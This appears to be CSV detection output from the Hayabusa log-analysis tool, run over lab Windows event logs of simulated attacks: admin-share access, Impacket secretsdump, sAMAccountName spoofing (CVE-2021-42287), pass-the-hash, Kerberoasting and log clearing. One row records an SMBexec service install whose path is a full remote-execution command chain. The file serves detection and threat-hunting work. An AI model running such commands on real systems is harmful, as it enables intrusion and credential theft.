0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx
2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,,New Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx
2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx
2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
